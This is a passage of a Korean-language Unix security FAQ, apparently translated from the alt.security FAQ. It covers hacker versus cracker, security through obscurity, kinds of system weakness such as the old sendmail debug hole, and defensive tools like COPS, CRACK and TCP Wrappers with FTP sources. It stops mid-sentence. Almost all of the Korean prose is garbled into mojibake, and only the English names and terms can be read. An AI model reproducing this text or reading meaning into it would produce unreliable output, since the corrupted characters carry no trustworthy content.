* º¸¾È¿¡ ´ëÇÑ ÁÖ¿ä FAQ 1.alt.security ¿Í comp.security.misc´Â ¾î¶²°÷Àΰ¡? comp.security.misc´Â À¯´Ð½º¿Í °ü·ÃµÈ ÄÄÇ»ÅÍ º¸¾ÈÀ» Åä·ÐÇÏ´Â Æ÷·³ÀÌ´Ù. alt.securityµµ ¸¶Âù°¡Áö·Î °°Àº ÁÖÁ¦¸¦ ´Ù·çÁö¸¸,ÀÚµ¿Â÷ÀÇ Àá±ÝÀåÄ¡³ª °æº¸ÀåÄ¡ ±îÁöµµ ´Ù·ç°íÀÖ´Ù. 2.ÇØÄ¿ ¿Í Å©·¡Ä¿ ÀÇ Â÷ÀÌ´Â ¹«¾ùÀΰ¡? USENET¿¡ ÀÇÇϸé,Å©·¡Ä¿(cracker)´Â ¿©·¯°¡Áö ÀÌÀ¯·Î ´Ù¸¥ »ç¶÷ÀÇ ½Ã½ºÅÛ¿¡ ħ ÅõÇÏ·Á´Â »ç¶÷µéÀ» ÁöĪÇÑ´Ù. ±×µéÀº ´ÜÁö '°¡´ÉÇϴϱî'¶ó´Â Çΰ踦 ´ë¸ç Àڽŵé ÀÇ ÇàÀ§¸¦ Á¤´çÈ­½ÃÅ°Áö¸¸,´ëºÎºÐÀº ºÒ¹ýÀûÀÎ ÀÏÀ» ÀúÁö¸§À¸·Î½á ¸í¼ºÀ» ¾òÀ¸·Á °í ÇÒ»ÓÀÌ´Ù. ƯÈ÷ ¹Ý»çȸÀûÀÎ Å©·¡Ä¿´Â ¹®È­¿¹¼úÀ» Æı«ÇÏ·Á´Â °æÇâÀ» °¡Áö°íÀ־, ÆÄÀϽà ½ºÅÛÀ» »èÁ¦ÇÏ°í,½Ã½ºÅÛÀ» Æı«ÇÏ°í,±×µéÀÇ ÈçÀûÀ» ÃßÀûÇÏ´Â ÇÁ·Î±×·¥À» ¸¶ºñ½Ã Ų´Ù.pc ÀÇ º¹Á¦ÀåÄ¡¸¦ Á¦°ÅÇؼ­ ºÒ¹ýº¹»çº»À» ¹èÆ÷ÇÏ´Â »ç¶÷À» °¡¸®Å°´Â °æ¿ì ¿¡µµ Å©·¡Ä¿¶ó´Â ¸»ÀÌ ³Î¸® ¾²ÀδÙ. USENET¿¡ ÀÇÇϸé, HACKER´Â ÄÄÇ»ÅÍ¿¡ °üÇÑ »ó´çÇÑ ¾çÀÇ Áö½Ä°ú Àü¹®ÀûÀÎ ±â¼úÀ» °®°í ÀÖÀ¸¸ç,±³¹¦ÇÏ°Ô ÀÌ·¯ÇÑ ±â¼úÀ» ÀÌ¿ëÇÒ ¼ö ÀÖ´Â »ç¶÷µéÀ» ¸»ÇÑ´Ù. ½ÇÁ¦·Î, »ç¶÷µéÀº ÇØÄ¿¶ó´Â ¸»À» Å©·¡Ä¿¿Í °ÅÀÇ °°Àº Àǹ̷ξ²°íÀÖ´Ù. usenet¿¡¼­µµ ÀÌ·¯ÇÑ °æ¿ì´Â ½É½ÉÄ¡¾Ê°Ô ³ªÅ¸³ª¼­ »ç¶÷µéÀ» È¥¶õ½ÃÅ°°í ÀÖ´Ù. º¸ ¾ÈÀ» ´Ù·ç´Â °Ô½ÃÆÇ¿¡ Å©·¡Ä¿¸¦ ÇØÄ¿·Î À߸ø »ç¿ëÇÑ °Ô½Ã¹°À» ¿Ã¸°´Ù¸é ¸¹Àº ºñ ³­À» ¸éÄ¡ ¸øÇÒ °ÍÀÌ´Ù. 3.'security through abscurity'¶õ ¹«¾ùÀΰ¡? STO(ºÒÅõ¸íÇÔ¿¡ ÀÇÇÑ º¸¾È)´Â »ç¿ëÀÚ±×·ìÀÇ ¿ÜºÎ¿¡ ÀÖ´Â ¾î´À ´©±¸¶óµµ ³»ºÎ ¸ÞÄ«´ÏÁò¿¡ ´ëÇÏ¿© ¾Æ¹«°Íµµ ¹ß°ßÇÒ ¼ö ¾ø´Â ÇÑ, ½Ã½ºÅÛÀÌ ¾ÈÀüÇÏ´Ù´Â ¹ÏÀ½À» ¸»ÇÑ´Ù. "´©±¸¶óµµ ¿µ¿øÈ÷ ¹ß°ßÇÏÁö ¸øÇÒ °ÍÀÌ´Ù"¶ó´Â °¡Á¤À» °¡Áö°í,password¸¦ ÀÌÁøÆÄÀÏ¿¡ ¼û±â´Â °ÍÀº STOÀÇ ´ëÇ¥Àû ¿¹ÀÌ´Ù. STO´Â ¸¹Àº °ü·áÁÖÀÇÀÚµé(±ºÀÎ,°ø¹«¿ø....)ÀÌ ÁÁ¾ÆÇϴ öÇÐÀ̸ç, ½Ã½ºÅÛ¿¡ 'pseudosecurity'¸¦ Á¦°øÇÏ´Â Áß¿äÇÑ ÇÑ ¹æ¹ýÀÌ´Ù. °³¹æÈ­µÈ ½Ã½ºÅÛ, ³×Æ®¿öÅ·, ÇÁ ·Î±×·¥ ±â¼ú¿¡ ´ëÇÑ ÀÌÇØÀÇ Áõ°¡, ±×¸®°í ÀϹÝÀÎÀÌ »ç¿ëÇÒ ¼ö ÀÖ´Â °­·ÂÇÑ ÄÄÇ» ÅÍÀÇ µîÀåÀ¸·Î ÀÎÇÏ¿© STOÀÇ À¯¿ëÇÔÀº Á¡Á¡ ¾àÇØÁ³´Ù. STOÀÇ ±âº»Àº '¾Ë ÇÊ¿ä'¿¡ ÀÇÇؼ­ ½Ã½ºÅÛÀ» »ç¿ëÇÏ´Â °ÍÀÌ´Ù. ¾î¶² »ç¶÷ÀÌ ½Ã½º ÅÛ º¸¾È¿¡ ¿µÇâÀ» ¹ÌÄ¡´Â ¹æ¹ýÀ» ¸ð¸¥´Ù¸é ±×°ÍÀº À§ÇèÇÏÁö ¾Ê´Ù. ¸ðµÎ°¡ ÀÎÁ¤ÇϵíÀÌ, STO´Â ¹ÏÀ» ¸¸ÇÑ ÀÌ·ÐÀ» °¡Áö°í ÀÖÁö¸¸, ¾î¿ ¼ö ¾ø´Â ¿¹¿Ü ÀÇ °æ¿ìµµ ÀÖ´Ù. ±×°ÍÀº ¹Ù·Î ½Ã½ºÅÛÀÇ ¿î¿µÀÚµé·Î, ¸¸ÀÏ À¯´ÉÇÑ Á÷¿øÀÌ ´õ ³ªÀº º¸¼ö¸¦ ¹Þ°í ´Ù¸¥ Á÷ÀåÀ¸·Î °£´Ù¸é, ±×°¡ ¾Ë°í ÀÖ´Â Áö½Äµµ ÇÔ²² °¡¹ö¸°´Ù. ÀÏ´Ü ±×·± ºñ¹ÐÀÌ ³ëÃâµÇ¸é ½Ã½ºÅÛÀÇ º¸¾Èµµ ´õ ÀÌ»ó ¾ÈÀüÇÏÁö ¾Ê´Ù. ÃÖ±Ù¿¡´Â Æò¹üÇÑ »ç¿ëÀڵ鵵 ½Ã½ºÅÛÀÌ µ¹¾Æ°¡´Â ¹æ¹ý¿¡ ´ëÇÏ¿© ÀÚ¼¼ÇÏ°Ô ¾Ë ÇÊ ¿ä°¡ ÀÖÀ¸¹Ç·Î ±× °á°ú STOÀÇ È¿°ú´Â ¸¹ÀÌ ¾àÇØÁ³´Ù. ¿À´Ã³¯ ¸¹Àº »ç¿ëÀÚµéÀÌ Àü¿¡´Â ¾Ë ÇÊ¿ä°¡ ¾ø¾ú´ø ½Ã½ºÅÛ¿¡ ´ëÇØ »ó´çÈ÷ ¸¹Àº Áö½ÄÀ» °¡Áö°Ô µÇ¾ú±â ´ë ¹®¿¡, º¸¾È¿¡ »ó´çÈ÷ ¸¹Àº ¹®Á¦°¡ »ý±â±â ½ÃÀÛÇß´Ù. µû¶ó¼­ Áö±Ý ÇÊ¿äÇÑ °ÍÀº öÇÐÀûÀ¸·Î ¾ÈÀüÇϱ⠺¸´Ù´Â ½ÇÁ¦ÀûÀ¸·Î ¾ÈÀüÇÑ ½Ã½º ÅÛ(Kerberos,Secure RPC)À» ¸¸µå´Â °ÍÀÌ´Ù. 'Shadow Passwords'´Â Á¾Á¾ STO¿Í °°ÀÌ ¹«½Ã´çÇÏÁö¸¸, ÀÌ°ÍÀº ¿ÇÁö ¾Ê´Ù. ¿Ö³ÄÇϸé STO´Â ¾Ë°í¸®ÁòÀ̳ª Å×Å©´Ð¿¡ ´ëÇÑ Á¢±ÙÀ» Á¦ÇÑÇÏÁö¸¸ ½¦µµ¿ìÆнº¿ö µå´Â ½ÇÁúÀûÀÎ ÀÚ·á¿¡ ´ëÇÑ Á¢±ÙÀ» Á¦ÇÑÇϱ⠶§¹®ÀÌ´Ù. 4.½Ã½ºÅÛÀÇ º¸¾ÈÀ» ÀúÇØÇÏ´Â ¿ä¼Ò´Â ¹«¾ùÀΰ¡? ÁøÁ¤À¸·Î ¾ÈÀüÇÑ ½Ã½ºÅÛÀº ÆÄ¿ö¸¦ ²ô°í Äڵ带 »« ÈÄ¿¡ ƼŸ´½ ¼±À¸·Î ¹­¾î¼­ ÄÜÅ©¸®Æ®·Î ¹ÐºÀÀ» ÇÏ°í µ¶°¡½º¸¦ ä¿ö¼­ ÃÖ½ÅÀÇ ¹«±â¸¦ °¡Áø °æºñ¿øÀ¸·Î º¸È£ ¸¦ ÇÏ´Â °ÍÀÌ´Ù. ±×·¯³ª ±×·¸´Ù°í ÇÏ´õ¶óµµ ´©±¸µµ °Å±â¿¡ ÀÚ½ÅÀÇ »ý¸íÀ» °É¸¸ Å­ ¾ÈÀüÇÏ´Ù°í ÀÚ½ÅÇÏÁö´Â ¸øÇÑ´Ù. ½Ã½ºÅÛÀÇ º¸¾È ¿©ºÎ´Â ±×°ÍÀ» »ç¿ëÇÏ´Â »ç¶÷µé¿¡°Ô ´Þ·ÁÀÖ´Ù. ½Ã½ºÅÛÀ» »ç¿ëÇÏ ´Â ¸ðµç »ç¶÷µéÀÌ ÀÚ±âµéÀÇ ½Ã½ºÅÛÀ» ¾Æ¹« ¹®Á¦ ¾øÀÌ ÀÌ¿ëÇϱâ À§Çؼ­ ³ª¸§´ë·Î Ã¥ÀÓ°¨À» °®°í ÀÓÇÑ´Ù¸é Ưº°ÇÑ º¸È£ÀåÄ¡ ¾øÀ̵µ ¾ÈÀüÇÏ°Ô À¯ÁöµÉ°ÍÀÌ´Ù. ¸¹Àº ½ÇÇè½Ç¿¡ ÀÖ´Â PCµéÀº ÀÌ·± ¹æ½ÄÀ¸·Î ¾ÆÁÖ Àß ¿î¿ëµÇ°í ÀÖ´Ù. ¹®Á¦´Â º¸¾È À¯Áö¿¡ ´ëÇÑ Çʿ伺À» ´À³¢¸é¼­ ½ÃÀ۵ȴÙ. ÀÏ´Ü ½Ã½ºÅÛ¿¡ º¸¾È Àå Ä¡¸¦ ¼³Ä¡ÇÏ°í ³ª¸é,±×°ÍÀº °áÄÚ ³¡³ªÁö ¾Ê´Â ÀüÀïÀÌ µÉ °ÍÀÌ´Ù. º¸¾È»óÀÇ ÇãÁ¡Àº ´ÙÀ½°ú °°ÀÌ 4°¡ÁöÀÇ Á¾·ù·Î ³ª´­ ¼ö ÀÖ´Ù. (1) ¹°¸®Àû ÇãÁ¡ ºÒ¹ý »ç¿ëÀÚ°¡ ½Ã½ºÅÛ¿¡ ¹°¸®ÀûÀ¸·Î Á¢±ÙÇÔÀ¸·Î½á ¹®Á¦°¡ »ý±â´Âµ¥,±×°¡ Çؼ­´Â ¾ÈµÇ´Â ÀÛ¾÷À» ÇÒ ¼öµµ Àֱ⠶§¹®ÀÌ´Ù. ÀÌ·¯ÇÑ ÁÁÀº ¿¹´Â °øµ¿À¸·Î »ç¿ëÇÏ´Â ¿öÅ©½ºÅ×À̼ǽǿ¡¼­ ÀϾ ¼ö Àִµ¥, ±× ·±°÷¿¡¼­´Â »ç¿ëÀÚ°¡ ¼Õ½±°Ô ½Ã½ºÅÛÀ» ´ÜÀÏ»ç¿ëÀÚ¸ðµå·Î ¹Ù²Ù°í,ÆÄÀÏ ½Ã½ºÅÛÀ» µÚ¼¯¾î ¹ö¸± ¼ö ÀÖ´Ù. µû¶ó¼­ »çÀü¿¡ ÃæºÐÇÑ ÁÖÀÇ°¡ ÇÊ¿äÇÒ °ÍÀÌ´Ù. ¶Ç ´Ù¸¥ ¿¹·Î¼­,´©±¸³ª ½±°Ô ÀÐÀ» ¼ö ÀÖ´Â ¹é¾÷ÀåÄ¡ÀÇ °æ¿ì ±â¹Ð À¯Áö¸¦ À§ÇØ Á¢±ÙÀ» Á¦ÇÑÇÒ ÇÊ¿ä°¡ ÀÖ´Ù. (2)¼ÒÇÁÆ®¿þ¾î »óÀÇ ÇãÁ¡ Ưº°ÇÑ ±ÇÇÑÀ» °¡Áö´Â ÇÁ·Î±×·¥µé(daemons,cronjobs)ÀÇ °æ¿ì,À̵éÀÌ ¿ø·¡ÀÇ ¸ñÀû °ú ´Ù¸£°Ô ÀÌ¿ëµÉ °¡´É¼ºÀÌ ÀÖ´Ù. °¡Àå À¯¸íÇÑ ¿¹°¡ sendmail debug¿¡ ÀÖ´ø ÇãÁ¡Àε¥, Å©·¡Ä¿°¡ ÀÌ°ÍÀ» ÀÌ¿ëÇÏ¿© root·Î ºüÁ®³ª°¡´Â ÁÁÀº ¼ö´ÜÀÌ µÇ¾ú´Ù. ÀÌ°ÍÀº ÆÄÀÏ ½Ã½ºÅÛÀ» »èÁ¦ÇÏ°í,»õ·Î¿î °èÁ¤À» ¸¸µé°í, Æнº¿öµå È­ÀÏÀ» º¹Á¦ÇÏ´Â µîÀÇ ÀÛ¾÷¿¡ »ç¿ëµÇ¾ú´Ù.(ÀϹÝÀûÀÎ »ý °¢°ú´Â ´Ù¸£°Ô,sendmailÀ» ÅëÇÑ Ä§Åõ´Â ¾Ç¸í³ôÀº INTERNET WORM¸¸ ÇÒ ¼ö ÀÖ¾ú´ø °ÍÀº ¾Æ´Ï¾ú´Ù. Å©·¡Ä¿¶ó¸é ´©±¸µçÁö telnetÀ» ÀÌ¿ëÇÏ¿© »ó´ë ½Ã½ºÅÛÀÇ port25À» ÅëÇؼ­ ħÅõÇÒ ¼ö ÀÖ¾ú´Ù) ÀÌ·± »õ·Î¿î ÇãÁ¡Àº Ç×»ó ¹ß°ßµÉ ¼ö ÀÖÀ¸¹Ç·Î ´Ã ´ÙÀ½°ú °°ÀÌ ´ëºñÇØ¾ß ÇÑ´Ù. * root/daemons/bin¿¡´Â °¡±ÞÀû ÃÖ¼ÒÇÑÀÇ ÇÁ·Î±×·¥À» ¼³Ä¡Çϵµ·Ï ÇÑ´Ù. ÀÌ°÷¿¡ ÀÖ´Â ÇÁ·Î±×·¥µéÀº Ưº°ÇÑ ±ÇÇÑÀ» °¡Áö°í À־ À§ÇèÇÏ°Ô ¾²ÀÏ ¼ö Àֱ⠶§ ¹®ÀÌ´Ù. * ¹®Á¦ÀÇ ÇØ°áÃ¥À» Á¦°ø¹ÞÀ» ¼ö ÀÖ´Â °÷µé¿¡ ´ëÇØ mailing list¸¦ ¸¸µé¾î ¹®Á¦ °¡ ¹ß»ýÇÒ °æ¿ì Áï°¢ÀûÀ¸·Î ¿¬¶ôÀ» ÃëÇØ ±× ¹®Á¦¿¡ ´ëÇÑ Á¤º¸¸¦ ¹ÞÀ» ¼ö ÀÖ µµ·Ï ÇؾßÇÑ´Ù. (3)ȣȯ¼ºÀÇ ¹®Á¦ ´©±¸ÀÇ À߸øÀº ¾Æ´ÏÁö¸¸,½Ã½ºÅÛ ¿î¿µÀÚ°¡ °æÇèÀÌ ºÎÁ·Çؼ­ º¸¾ÈÀÇ Ãø¸é¿¡¼­ ¹® Á¦°¡ ÀÖ´Â Çϵå¿þ¾î ¿Í ¼ÒÇÁÆ®¿þ¾î¸¦ ½Ã½ºÅÛ¿¡ ¼³Ä¡ÇÑ °æ¿ìÀÌ´Ù. ÀÌ¿Í°°Àº ¹®Á¦ ´Â ½Ã½ºÅÛÀÌ ÀÏ´Ü °¡µ¿µÇ°í ³ª¸é ¹ß°ßÇϱⰡ Èûµé´Ù. µû¶ó¼­ ½ÅÁßÇÏ°Ô °í·ÁÇÏ¿© ½Ã½ºÅÛÀ» ±¸¼ºÇØ¾ß ÇÑ´Ù. (4) Àû´çÇÑ º¸¾ÈÁ¤Ã¥ÀÇ ÀÛ¼º°ú À¯ÀÚ ³×¹ø° º¸¾È ¹®Á¦´Â Àνİú ÀÌÇØ¿¡ °üÇÑ °ÍÀÌ´Ù. ¿Ïº®ÇÑ ÇÁ·Î±×·¥,º¸È£ÀåÄ¡°¡ µÈ Çϵå¿þ¾î, ±×¸®°í ȣȯÀûÀÎ ºÎÇ°ÀÏÁö¶óµµ, ÀûÀßÇÑ º¸¾È Á¤Ã¥À» °¡Áö°í ¿î¿µµÇ Áö ¾Ê´Â´Ù¸é Á¦ ¿ªÇÒÀ» ÇÏÁö ¸øÇÒ °ÍÀÌ´Ù. ¸¸¾à »ç¿ëÀÚµéÀÌ ÀÚ½ÅÀÇ »ç¿ëÀÚ¸íÀ» °Å²Ù·Î Çؼ­ Æнº¿öµå¸¦ Á¤Çعö¸®´Â ½ÄÀ¸·Î º¸¾È °³³äÀÌ Èñ¹ÚÇÏ´Ù¸é ¾Æ¹«¸® ÁÁ Àº Æнº¿öµå ¹æ½ÄÀÏÁö¶óµµ ¾Æ¹«·± °¡Ä¡°¡ ¾ø´Ù. º¸¾ÈÀ̶ó´Â °ÍÀº ±×·¯ÇÑ Á¤Ã¥¿¡ ¸ÂÃ߾ ½Ã½ºÅÛÀ» ¾ó¸¶³ª Àß ¿î¿µÇϴ°¡¿¡ ´Þ·ÁÀÖ´Ù. 5.º¸¾ÈÀ» µµ¿ÍÁÖ´Â µµ±¸¿¡´Â ¾î¶² °ÍµéÀÌ Àִ°¡? (1)'COPS' Dan Farmer¿¡ ÀÇÇØ °³¹ßµÈ ÀÌ ÇÁ·Î±×·¥Àº º¸¾È »óŸ¦ °Ë»çÇØÁÖ´Â ±â´ÉÀ» ÇÏ´Â shell scriptÀÌ´Ù. ±âÃÊÀûÀÎ password cracker,setuid ÇÁ·Î±×·¥¿¡¼­ Àǽɽº·± º¯È­ ¸¦ ¾Ë¾Æº¸±â À§ÇØ ÆÄÀϽýºÅÛÀ» °Ë»çÇÏ´Â ±â´É,±âº» ½Ã½ºÅÛ°ú »ç¿ëÀÚ ÆÄÀÏÀÇ permissionÀ» °Ë»çÇÏ´Â ±â´É,¹®Á¦¸¦ ÀÏÀ¸Å³¸¸ÇÑ ÇൿÀ» ÇÏ´Â ½Ã½ºÅÛ ÇÁ·Î±×·¥À» °Ë»çÇÏ´Â µîÀÇ ±â´ÉÀ» °¡Áö°íÀÖ´Ù. (2)'CRACK'(+'UFC') Alec Muffett¿¡ ÀÇÇØ °³¹ßµÈ ÀÌ ÇÁ·Î±×·¥Àº,¿ÜºÎÀο¡ ½±°Ô ³ëÃâµÉ °¡´É¼ºÀÌÀÖ´Â Æнº¿öµå¸¦ ã¾Æ³»´Â ±â´ÉÀ» °¡Áö°íÀÖ´Ù. ¾Æ¸¶µµ ÀÌ°ÍÀº Æнº¿öµå Å©·¡Ä¿·Î¼­ ´ëÁß¿¡ ¹èÆ÷µÇ´Â À¯ÀÏÇÑ ÇÁ·Î±×·¥À¸·Î¼­,»ç¿ëÀÚ°¡ ÀÚ½ÅÀÌ ¿øÇÏ´Â Æнº¿öµå¸¦ Á¤ È®ÇÏ°Ô ¼³Á¤ÇÒ ¼ö ÀÖµµ·Ï µµ¿ÍÁØ´Ù. ÀÌ°ÍÀº ³×Æ®¿öÅ©»ó¿¡¼­ °¡±ÞÀû ¸¹Àº ½Ã½ºÅÛ¿¡¼­ »ç¿ë °¡´ÉÇϵµ·Ï ³×Æ®¿öÅ© ±â´É ÀÌ ³»ÀåµÇ¾î ÀÖÀ¸¸ç,Unix crypt() ¾Ë°í¸®ÁòÀÇ ÃÖÀûÈ­µÈ ¹öÀüÀ¸·Î Á¦°øµÈ´Ù. crypt()¾Ë°í¸®Áò ÀÇ ÈξÀ ´õ ºü¸¥ ¹öÀüÀÎ 'UFC'´Â Michael Glad¿¡ ÀÇÇØ °³¹ßµÇ ¾úÀ¸¸ç ³×Æ®¿öÅ©»ó¿¡¼­ ¹«·á·Î ¹èÆ÷µÈ´Ù. UFC¿Í CRACK ÀÇ ÃֽŹöÀüÀº ¼­·Î ȣȯÀÌ µÇ¹Ç·Î ÇÔ²² »ç¿ëÀÌ °¡´ÉÇÏ´Ù. (3)NPasswd(Clyde Hoover) & Passwd+(Matt Bishop) ÀÌ ÇÁ·Î±×·¥Àº Æнº¿öµå Å©·¡Å· ÀüÀï¿¡¼­ ±ÕÇüÀ» µÇã±â À§ÇÏ¿© ÀÛ¼ºµÇ¾ú´Ù. À̵éÀº Ç¥ÁØ 'passwd'¸í·É¾î¸¦ ±³Ã¼ÇÏ¿© »ç¿ëÀÚ°¡ CRACK°°Àº ÇÁ·Î±×·¥¿¡ ÀÇ ÇØ ½±°Ô ³ëÃâµÉ ¼ö ÀÖ´Â Æнº¿öµå¸¦ Á¤ÇÏÁö ¸øÇϵµ·Ï ÇÏ´Â ±â´ÉÀ» °¡Áö°íÀÖ´Ù. System V,NIS/yp,shadow password schemes µîÀÇ ´Ù¾çÇÑ ½Ã½ºÅÛ¿¡¼­ ¾²ÀÏ ¼ö ÀÖ´Â ¿©·¯°¡Áö ¹öÀüÀÌ ³ª¿Í ÀÖ´Ù. ÀϹÝÀûÀ¸·Î ÆĽýºÆ® Æнº¿öµå ÇÁ·Î±×·¥À¸·Î ºÒ¸®¿î´Ù. (4)"SHADOW"-Shadow Password suite John F Haugh II °¡ °³¹ßÇÑ ÀÌ ÇÁ·Î±×·¥Àº ½¦µµ¿ìÆнº¿öµå ¸¦ ÀÌ¿ëÇÒ ¼ö ÀÖµµ ·Ï ÇØÁÖ´Â ÇÁ·Î±×·¥ÀÌ´Ù. Áï root ÀÌ¿Ü¿¡´Â ¾î´À ´©±¸µµ Æнº¿öµå ÆÄÀÏÀ» º¼¼ö°¡ ¾øÀ¸¸ç, Æнº¿öµå Å©·¡Å·À¸·ÎºÎÅÍ ¾ÈÀüÇÏ°Ô ½Ã½ºÅÛÀ» º¸È£ÇØÁØ´Ù. ÆĽýºÆ® Æнº ¿öµå¿Í ÇÔ²² ¾²ÀÎ´Ù¸é »ó´çÈ÷ ÁÁÀº º¸¾È ¹æ½ÄÀÌ µÉ °ÍÀÌ´Ù. (5)TCP Wrappers(Wietse Venema) À¯´Ð½º°¡ ±âº»ÀûÀ¸·Î Á¦°øÇÏ´Â ¸¹Àº ³×Æ®¿öÅ© ¼­ºñ½º¿¡ front-ent filter¸¦ Á¦°ø ÇÏ´Â ÇÁ·Î±×·¥ÀÌ´Ù. ¼³Ä¡µÇ°í ³ª¸é,FTP/TFTP,telnetµîÀ» ÀÌ¿ëÇÏ¿© ºÒ¹ýÀûÀ¸·Î ÀÌ·ç¾îÁö´Â Á¢¼ÓÀ» ¸·À» ¼ö ÀÖ´Ù. ´©±º°¡ ½Ã½ºÅÛ¿¡ ħÅõÇÏ·Á°í ÇÏ´Â °æ¿ì¿¡ À¯ ¿ëÇÏ°Ô ¾²ÀÏ ¼ö ÀÖ´Ù. (6)SecureLib SecurelibÀº kernel¿¡ µé¾îÀÖ´Â ¼¼°¡Áö ÇÔ¼öµé¿¡ ´ëÇÑ ´ëü ÇÔ¼ö¸¦ °¡Áö°íÀÖ´Ù. (accept(),recvfrom(),recvmsg())À̰͵éÀº ±âÁ¸ÀÇ ÇÔ¼öµé°ú ȣȯ¼ºÀ» °¡Áö°í ÀÖÀ¸ ¸ç,½Ã½ºÅÛÀÇ ÀÎÅÍ³Ý ¾îµå·¹½º¸¦ °Ë»çÇÏ¿© Á¢¼ÓÀÌ °¡´ÉÇÑ ½Ã½ºÅÛÀ» È®ÀÎÇÏ´Â ±â ´ÉÀ» °¡Áö°íÀÖ´Ù. Á¢¼ÓÀÌ °¡´ÉÇÑ host´Â configuration file¿¡ ±â·ÏµÈ´Ù. (7)SPI SPI´Â file integrity¸¦ Æ÷ÇÔÇÏ¿© configuration optionÀ» °Ë»çÇÏ´Â ÇÁ·Î±×·¥ÀÌ´Ù. Â÷ÈÄ¿¡´Â COPS¿¡ Æ÷Ç﵃ ¿¹Á¤ÀÌ´Ù.ÀÌ°ÍÀº ÀϹÝÀÎÀº »ç¿ëÇÒ ¼ö ¾ø°í, ¹Ì±¹ Á¤ºÎ ¸¸ÀÌ »ç¿ëÇÒ ¼ö ÀÖ´Ù. 6.cracking toolsÀ» ÀϹÝÀο¡°Ô °ø°³ÇÏ´Â °ÍÀÌ À§ÇèÇÏÁö ¾ÊÀº°¡? °³ÀÎÀÇ °ßÇØ¿¡ µû¶ó ´Ù¸£´Ù. ÀϺλç¶÷µéÀº COPS¿Í CRACKÀ» °ø°³ÇÑ °ÍÀÌ ¹«Ã¥ ÀÓÇÑ ÀÏÀ̶ó°í ÁÖÀåÇÑ´Ù. ºÎ´çÇÏ°Ô ÀÌ¿ëµÉ ¼ö Àֱ⠶§¹®ÀÌ´Ù. ±×·¯³ª ¿ªÀ¸·Î »ý°¢Çϸé, ÀÌ ÇÁ·Î±×·¥ÀÌ °®´Â ±àÁ¤ÀûÀÎ ¸éµµ ¹«½ÃÇÒ ¼ö ¾ø´Ù. ÀϹÝÀεéÀÌ ÀÌ ÇÁ·Î±×·¥µéÀ» ÀÌ¿ëÇؼ­ ÀÚ½ÅÀÇ ½Ã½ºÅÛÀ» °Ë»çÇϴµ¥ ¸¹Àº µµ¿òÀÌ µÇ±â ¶§¹®ÀÌ´Ù. µû¶ó¼­ °ø°³·Î ÀÎÇÑ È¿°ú°¡ ±àÁ¤ÀûÀÎÁö,ºÎÁ¤ÀûÀÎÁö´Â È®½ÇÄ¡ ¾Ê ´Ù. 7.ÀÌ·¯ÇÑ ÇÁ·Î±×·¥Àº ¾îµð¼­ ±¸ÇÒ ¼ö Àִ°¡? (1) COPS v 1.04,cert.sei.cmu.edu(pub/cops)¿Í archive.cis.ohio-state.edu(pub/cops)¿¡¼­ ftp ¸¦ ÀÌ¿ëÇÏ¸é °¡´ÉÇÏ´Ù. (2) CRACK/UFC Crack v4.1f, UFC oatchlevel 1. comp.sources.miscÀÇ volume 28¿¡¼­ ÁÖ¿äÇÑ USENET archive ¸¦ ÅëÇØ ½±°Ô ±¸ÇÒ¼ö ÀÖ´Ù. (3) NPasswd ÇöÀç ¸¹Àº ÇØÅ·¹öÀüÀÌ Á¸ÀçÇÑ´Ù. ¹öÀü 2.0ÀÌ ÁغñÁßÀ̸ç, ¿©·¯Àå¼Ò¿¡¼­ ¿©·¯¹öÀü À» ±¸ÇÒ ¼ö ÀÖ´Ù. (4)Passwd+ 'alpha version,update 3' - beta versionÀÌ °ð ³ª¿Ã ¿¹Á¤ÀÌ´Ù. dartmouth.eduÀÇ pub/passwd+.tae.Z ÆÄÀÏ·Î ±¸ÇÒ ¼ö ÀÖ´Ù. (5)SHADOW Usenet archive¿¡ ÀÖ´Â comp.source.misc µð·ºÅ丮¿¡¼­ ±¸ÇÒ ¼ö ÀÖ´Ù. (6) TCP wrappers anomymous FTP¸¦ ÀÌ¿ëÇÏ¸é °¡´ÉÇÏ´Ù. cert.sei.cmu.edu:pub/network_tools/tcp_wrapper.shar ftp.win.tue.nl:pub/security/log_tcp.shar.Z (7)Securelib eecs.nwu.edu ¿¡¼­ anonymous FTP¸¦ ÀÌ¿ëÇÏ¸é ±¸ÇÒ ¼öÀÖ´Ù. pub/securelib.tar·Î ÀúÀåµÇ¾î ÀÖ´Ù. 8.½Ã½ºÅÛÀÌ Ä§ÀÔÀ» ´çÇÏ´Â ÀÌÀ¯´Â ¹«¾ùÀÌ°í ¾î¶»°Ô ħÀÔÀ» ´çÇϴ°¡? ÀÌ°ÍÀº ´ÜÁ¤ÀûÀ¸·Î ´ë´äÇϱâ Èûµç ¹®Á¦ÀÌ´Ù. Å©·¡Ä¿°¡ ¸¹Àº ½Ã½ºÅÛ¿¡ ħÅõÇÔÀ¸ ·Î½á ¾ò´Â °ÍÀº ħÅõÇß´Ù´Â ±â·Ï»ÓÀÌ´Ù. Å©·¡Ä¿´Â »õ·Î¿î ½Ã½ºÅÛÀ¸·Î ħÅõÇϱâ Àü¿¡ ¿©·¯ ´Ü°è¸¦ °ÅÄ¡´Â ¹æ½ÄÀ¸·Î ÀÚ½ÅÀÇ ÈçÀûÀ» ¾ø¾ÚÀ¸·Î½á ÃßÀûÀ» ¾î·Æ°Ô ¸¸ µç´Ù. °¡´ÉÇÑ ¸¹Àº ½Ã½ºÅÛÀ» ħÅõÇÏ¿© ¾ò´Â ÀåÁ¡Àº Á¢¼Ó ¼¼Å¹ÀÌ ÈξÀ ¿ëÀÌÇØÁø ´Ù´Â »ç½ÇÀÌ´Ù. ¶Ç´Ù¸¥ ÀÌÀ¯´Â ½É¸®ÇÐÀûÀÎ °ÍÀ¸·Î,ÄÄÇ»Å͸¦ ´Ù·ç´Â °ÍÀ» ÁÁ¾ÆÇÏ´Â ÀϺΠ»ç¶÷µé Àº ¸¹Àº ½Ã½ºÅÛÀ» ħÅõÇÔÀ¸·Î½á ÀÚ½ÅÀÇ ½Ç·ÂÀ» È®ÀÎÇÏ°í ½Í¾îÇÏ´Â °ÍÀÌ´Ù. ±×µé Àº NASA,AT&T,UCB ¿Í °°Àº °Å´ë Á¶Á÷¿¡ ħÅõÇϱâ À§ÇÏ¿©,6°³ÀÇ ÀÎÅÍ³Ý ±â °è,2°³ÀÇ gateways ±×¸®°í X.25 network¸¦ °ÅÃļ­ À̵¿ÇÏ´Â °ÍÀ» '¾ÆÁÖ ¸Å²ô·´ ´Ù'°í »ý°¢ÇÑ´Ù. ±×°ÍÀ» ÀÎÅÍ³Ý °ü±¤À̶ó°í »ý°¢ÇÏ´Â °Í °°´Ù. ÀÌ·¯ÇÑ »ý°¢Àº Å©·¡Ä¿¿¡°Ô´Â 